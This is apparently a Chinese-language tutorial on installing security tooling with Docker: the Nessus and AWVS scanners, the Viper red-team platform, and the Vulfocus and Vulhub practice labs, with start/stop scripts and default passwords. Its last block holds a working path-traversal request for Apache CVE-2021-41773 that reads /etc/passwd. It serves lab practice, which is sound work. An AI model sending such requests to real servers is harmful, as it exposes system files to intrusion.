漏洞扫描

Nessus

image-20231028214612009

  • Nessus 号称是世界上最流行的漏洞扫描程序,全世界有超过 75000 个组织在使用它。该工具提供完整的电脑漏洞扫描服务,并随时更新其漏洞数据库。
  • Nessus 不同于传统的漏洞扫描软件,Nessus 可同时在本机或远端上遥控,进行系统的漏洞分析扫描。
  • Nessus 官网:https://www.tenable.com/
  • 由于在物理机或虚拟机中搭建过程过于繁琐,这里使用大佬搭建的 Docker 进行安装:

项目地址:https://github.com/elliot-bia/nessus

1
2
docker run -itd --name=nessus -p 8834:8834 ramisec/nessus
docker exec -it nessus /bin/bash /nessus/update.sh
  • 这里登陆可能会出现凭据错误或者密码错误,直接改密码:

注:作者有给密码提示,可以去看看。

1
2
docker exec -it nessus /opt/nessus/sbin/nessuscli chpasswd admin
# goktech@123
  • 写个快速启动脚本:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# nessus-yes
echo "---------------------------------------------"
sudo docker start nessus > /dev/null
echo "Success Start Nessus!"
echo "Username:admin - Password:goktech@123"
echo "Login Page:https://127.0.0.1:8834/#"
echo "---------------------------------------------"
sudo docker ps
echo "---------------------------------------------"

# nessus-no
echo "---------------------------------------------"
sudo docker stop nessus > /dev/null
echo "Success Stop Nessus!"
echo "---------------------------------------------"
sudo docker ps -a
echo "---------------------------------------------"

AVWS

logo-1
  • AWVS 是一个自动化的 Web 应用程序安全测试工具,它可以扫描任何可通过 Web 浏览器访问的和遵循 HTTP/HTTPS 规则的 Web 站点和 Web 应用程序。适用于任何中小型和大型企业的内联网、外延网和面向客户、雇员、厂商和其它人员的 Web 网站。
  • AWVS 可以通过检查 SQL 注入攻击漏洞、XSS 跨站脚本攻击漏洞等漏洞来审核 Web 应用程序的安全性。
  • AWVS 官网:https://www.acunetix.com/
  • 由于在物理机或虚拟机中搭建过程过于繁琐,这里使用大佬搭建的 Docker 进行安装:
1
docker run -it -d -p 3443:3443 --privileged=true --name=awvs secfa/docker-awvs

项目地址:https://hub.docker.com/r/secfa/docker-awvs/tags

  • 写个快速启动脚本:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# awvs-yes
echo "---------------------------------------------"
sudo docker run -it -d -p 3443:3443 --privileged=true --name=awvs secfa/docker-awvs > /dev/null
echo "Success Start AWVS!"
echo "Username:admin@admin.com - Password:Admin123"
echo "Login Page:https://127.0.0.1:3443/#/login"
echo "---------------------------------------------"
sudo docker ps
echo "---------------------------------------------"

# awvs-no
echo "---------------------------------------------"
sudo docker rm -f awvs > /dev/null
echo "Success Remove AWVS!"
echo "---------------------------------------------"
sudo docker ps -a
echo "---------------------------------------------"

漏洞利用

Viper

image-20231028214621186

  • Viper(炫彩蛇)是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化。

    • 集成杀软绕过、内网隧道、文件管理、命令行等基础功能。
    • 当前已集成70+个模块,覆盖初始访问/持久化/权限提升/防御绕过/凭证访问/信息收集/横向移动等大类。
    • 目标是帮助红队工程师提高攻击效率、简化操作、降低技术门槛。
    • 支持在浏览器中运行原生 msfconsole,且支持多人协作。
  • 创建文件夹:

1
sudo mkdir -p ~/tools/viper ; cd ~/tools/viper
  • 创建 docker-compose.yml 文件,其中 command 后面跟着的是密码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
tee docker-compose.yml <<-'EOF'
version: "3"
services:
viper:
image: registry.cn-shenzhen.aliyuncs.com/toys/viper:latest
container_name: viper-c
network_mode: "host"
restart: always
volumes:
- ~/tools/viper/loot:/root/.msf4/loot
- ~/tools/viper/db:/root/viper/Docker/db
- ~/tools/viper/module:/root/viper/Docker/module
- ~/tools/viper/log:/root/viper/Docker/log
- ~/tools/viper/nginxconfig:/root/viper/Docker/nginxconfig
command: ["goktech@123"]
EOF
  • 写个快速启动脚本:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# viper-yes
echo "---------------------------------------------"
cd ~/tools/viper ; sudo docker-compose up -d > /dev/null
echo "Success Start Viper!"
echo "Username:root - Password:goktech@123"
echo "Login Page:https://127.0.0.1:60000"
echo "---------------------------------------------"
sudo docker ps
echo "---------------------------------------------"

# viper-no
echo "---------------------------------------------"
cd ~/tools/viper ; sudo docker-compose down > /dev/null
echo "Success Remove Vpier!"
echo "---------------------------------------------"
sudo docker ps -a
echo "---------------------------------------------"

漏洞靶场

Vulfocus

  • Vulfocus 是一个漏洞集成平台,将漏洞环境 docker 镜像,放入即可使用,开箱即用。
  • Vulfocus 的特性:
    • 一键漏洞环境启动,方便简单。
    • 自带 Flag 功能:每次启动 flag 都会自动更新,明确漏洞是否利用成功。
    • 带有计分功能也可适用于相关安全人员能力的考核。
    • 兼容 Vulhub、Vulapps 中所有漏洞镜像。
    • 支持可视化编排漏洞环境。
  • 官方网址:https://fofapro.github.io/vulfocus/
  • 这里主要介绍快速安装,手动安装过于麻烦,累死个人。
  • 这里不拉取镜像直接运行容器,本地没有镜像会自动拉取(官方文档写的有点复杂,这里简化了一下),将 VUL_IP 改为自己服务器地址即可:
1
docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock  -e VUL_IP=xxx.xxx.xxx.xxx vulfocus/vulfocus
  • 默认账户密码为:admin/admin
  • 安装完成后,直接访问对应 IP 即可:

image-20231028214812269

  • sagikazarmark/dvwa 为例,直接拉取作为靶场即可。

Vulhub

  • Vulhub 是一个基于 docker 和 docker-compose 的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
  • 官方网址:https://vulhub.org/
  • 由于 Vulhub 靶场较为分散,无法使用一个容器代表所有漏洞,需要下载源码:
1
git clone https://github.com/vulhub/vulhub.git
  • 源码下载完,使用就非常简单了(示例):
    1. 在此页面搜索漏洞:https://vulhub.org/#/environments/
    2. 查看漏洞存在的路径,主要漏洞利用方式。
1
2
3
4
# 这里以 Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773) 为例
cd httpd/CVE-2021-41773
docker-compose up -d
curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

image-20231028214817218